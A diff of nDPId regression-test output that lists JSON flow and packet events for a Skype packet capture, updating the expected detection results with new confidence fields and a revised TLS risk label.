 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1355,"source":"skype.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":2,"flow_last_seen":1431969698840,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431969698840,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADkGRn4XziGmwKgBIgG7w6oZSGV1Rgv0Z6ASOJDhugAAAgQFrAQCCArsLyLPPiNmuAEDAwU="}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1356,"source":"skype.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":3,"flow_last_seen":1431969698840,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431969698840,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0ZSJAAEAG2mPAqAEiF84hpsOqAbtGC\/RnGUhldoAQECw4twAAAQEICj4jZuLsLyLP"}
-00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1357,"source":"skype.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969698797,"flow_last_seen":1431969698841,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":41,"midstream":0,"ts_msec":1431969698841,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":50090,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"apps.skype.com","ja3":"3d49c0a7161d6636fcb6973f14e05046","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1357,"source":"skype.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969698797,"flow_last_seen":1431969698841,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":41,"midstream":0,"ts_msec":1431969698841,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":50090,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"apps.skype.com","ja3":"3d49c0a7161d6636fcb6973f14e05046","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1358,"source":"skype.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969699142,"flow_last_seen":1431969699142,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969699142,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":50091,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1358,"source":"skype.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":1,"flow_last_seen":1431969699142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969699142,"pkt":"0NQSxnP1PBXCt3IOCABFAABAQstAAEAGrVjAqAEinTfrksOrAbuMrH5PAAAAALAC\/\/911AAAAgQFtAEDAwUBAQgKPiNoDgAAAAAEAgAA"}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1360,"source":"skype.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":2,"flow_last_seen":1431969699217,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431969699217,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+iedN+uSwKgBIgG7w6sASTQ1jKx+UKASOJCu2QAAAgQFrAQCCApMXR6HPiNoDgEDAwk="}
@@ -799,25 +799,24 @@
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1590,"source":"skype.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":3,"flow_last_seen":1431969711097,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431969711097,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0CpBAAEAGnRXAqAEinTg0HMO8nEnrI3U0Hv\/4VYAQECx2mwAAAQEICj4jloNMXGQg"}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1616,"source":"skype.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969712913,"flow_last_seen":1431969712913,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1431969712913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":49485,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00616{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1616,"source":"skype.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":1,"flow_last_seen":1431969712913,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"ts_msec":1431969712913,"pkt":"AQBef\/\/6PBXCt3IOCABFAAChlVQAAAERcjPAqAEi7\/\/\/+sFNB2wAjXH\/TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KTVg6IDINCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KU1Q6IHVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6V0FOUFBQQ29ubmVjdGlvbjoxDQoNCg=="}
-00613{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1616,"source":"skype.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969712913,"flow_last_seen":1431969712913,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1431969712913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":49485,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1616,"source":"skype.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969712913,"flow_last_seen":1431969712913,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1431969712913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":49485,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00611{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1617,"source":"skype.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":2,"flow_last_seen":1431969712913,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"ts_msec":1431969712913,"pkt":"AQBef\/\/6PBXCt3IOCABFAACgzegAAAEROaDAqAEi7\/\/\/+sFNB2wAjNfyTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KTVg6IDINCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KU1Q6IHVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6V0FOSVBDb25uZWN0aW9uOjENCg0K"}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1618,"source":"skype.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969712913,"flow_last_seen":1431969712913,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1431969712913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":51066,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1618,"source":"skype.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":1,"flow_last_seen":1431969712913,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"ts_msec":1431969712913,"pkt":"AQBef\/\/6PBXCt3IOCABFAAChxxoAAAERQG3AqAEi7\/\/\/+sd6B2wAjWvSTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KTVg6IDINCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KU1Q6IHVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6V0FOUFBQQ29ubmVjdGlvbjoxDQoNCg=="}
-00613{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1618,"source":"skype.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969712913,"flow_last_seen":1431969712913,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1431969712913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":51066,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1618,"source":"skype.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969712913,"flow_last_seen":1431969712913,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1431969712913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":51066,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00611{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1619,"source":"skype.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":2,"flow_last_seen":1431969712913,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"ts_msec":1431969712913,"pkt":"AQBef\/\/6PBXCt3IOCABFAACgMZsAAAER1e3AqAEi7\/\/\/+sd6B2wAjNHFTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KTVg6IDINCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KU1Q6IHVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6V0FOSVBDb25uZWN0aW9uOjENCg0K"}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1620,"source":"skype.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969712913,"flow_last_seen":1431969712913,"flow_idle_time":180000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1431969712913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":54067,"dst_port":5351,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1620,"source":"skype.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":1,"flow_last_seen":1431969712913,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1431969712913,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoiaEAAEARbbDAqAEiwKgBAdMzFOcAFCBsAAEAADLdMt0AAA4Q"}
 00541{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1621,"source":"skype.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969712918,"flow_last_seen":1431969712918,"flow_idle_time":120000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1431969712918,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1621,"source":"skype.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":1,"flow_last_seen":1431969712918,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1431969712918,"pkt":"PBXCt3IO0NQSxnP1CABFwABEBYEAAEAB8QTAqAEBwKgBIgMDgJYAAAAARQAAKImhAABAEW2wwKgBIsCoAQHTMxTnABQgbAABAAAy3TLdAAAOEA=="}
-00593{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1621,"source":"skype.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969712918,"flow_last_seen":1431969712918,"flow_idle_time":120000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1431969712918,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","l4_proto":"icmp","ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.041447}
+00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1621,"source":"skype.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969712918,"flow_last_seen":1431969712918,"flow_idle_time":120000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1431969712918,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.041447}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1623,"source":"skype.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969712931,"flow_last_seen":1431969712931,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969712931,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50109,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1623,"source":"skype.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":1,"flow_last_seen":1431969712931,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969712931,"pkt":"0NQSxnP1PBXCt3IOCABFAABAK1RAAEAGGV7AqAEiW77YfcO9MD57jsMsAAAAALAC\/\/8yeAAAAgQFtAEDAwUBAQgKPiOdpAAAAAAEAgAA"}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1624,"source":"skype.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":2,"flow_last_seen":1431969712980,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431969712980,"pkt":"PBXCt3IO0NQSxnP1CABFCAA0xLRAAPUGywBbvth9wKgBIjA+w71YjgIOe47DLYASH\/7LvwAAAgQFoAEDAwQBAQQC"}
 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1625,"source":"skype.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":3,"flow_last_seen":1431969712981,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1431969712981,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoyL5AAEAGfAvAqAEiW77YfcO9MD57jsMtWI4CD1AQIAAMeQAA"}
 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1632,"source":"skype.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":2,"flow_last_seen":1431969713175,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1431969713175,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoTzkAAEARqBjAqAEiwKgBAdMzFOcAFCBsAAEAADLdMt0AAA4Q"}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1633,"source":"skype.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":2,"flow_last_seen":1431969713177,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1431969713177,"pkt":"PBXCt3IO0NQSxnP1CABFwABEBYIAAEAB8QPAqAEBwKgBIgMDgJYAAAAARQAAKE85AABAEagYwKgBIsCoAQHTMxTnABQgbAABAAAy3TLdAAAOEA=="}
-00617{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1658,"source":"skype.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431969710853,"flow_last_seen":1431969713605,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3582,"flow_avg_l4_payload_len":111,"midstream":0,"ts_msec":1431969713605,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":50108,"dst_port":40009,"l4_proto":"tcp","ndpi": {"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}}
-00618{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1658,"source":"skype.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431969710853,"flow_last_seen":1431969713605,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3582,"flow_avg_l4_payload_len":111,"midstream":0,"ts_msec":1431969713605,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":50108,"dst_port":40009,"l4_proto":"tcp","ndpi": {"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00597{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1658,"source":"skype.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431969710853,"flow_last_seen":1431969713605,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3582,"flow_avg_l4_payload_len":111,"midstream":0,"ts_msec":1431969713605,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":50108,"dst_port":40009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1659,"source":"skype.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":3,"flow_last_seen":1431969713715,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1431969713715,"pkt":"0NQSxnP1PBXCt3IOCABFAAAorjMAAEARSR7AqAEiwKgBAdMzFOcAFCBsAAEAADLdMt0AAA4Q"}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1660,"source":"skype.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":3,"flow_last_seen":1431969713717,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1431969713717,"pkt":"PBXCt3IO0NQSxnP1CABFwABEBYMAAEAB8QLAqAEBwKgBIgMDgJYAAAAARQAAKK4zAABAEUkewKgBIsCoAQHTMxTnABQgbAABAAAy3TLdAAAOEA=="}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1662,"source":"skype.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713736,"flow_last_seen":1431969713736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969713736,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50110,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -826,28 +825,28 @@
 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1666,"source":"skype.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":3,"flow_last_seen":1431969713779,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1431969713779,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoL3hAAEAGFVLAqAEiW77YfcO+MD4D6993vOs\/Q1AQIADGPwAA"}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1669,"source":"skype.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431969713813,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"176.26.55.167","src_port":13021,"dst_port":63773,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1669,"source":"skype.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":1,"flow_last_seen":1431969713813,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"ts_msec":1431969713813,"pkt":"0NQSxnP1PBXCt3IOCABFAAAuRSsAAEARjAjAqAEisBo3pzLd+R0AGvy6nPQCqlUgKb9nOC7NdHVpaZsV"}
-00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1669,"source":"skype.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431969713813,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"176.26.55.167","src_port":13021,"dst_port":63773,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1669,"source":"skype.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431969713813,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"176.26.55.167","src_port":13021,"dst_port":63773,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1670,"source":"skype.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431969713813,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.185.207.12","src_port":13021,"dst_port":45493,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1670,"source":"skype.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":1,"flow_last_seen":1431969713813,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"ts_msec":1431969713813,"pkt":"0NQSxnP1PBXCt3IOCABFAAAuxDQAAEAR2PrAqAEiTLnPDDLdsbUAGvt+nPYC2PYYRrvqRJzYx\/ENvQip"}
-00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1670,"source":"skype.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431969713813,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.185.207.12","src_port":13021,"dst_port":45493,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1670,"source":"skype.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431969713813,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.185.207.12","src_port":13021,"dst_port":45493,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
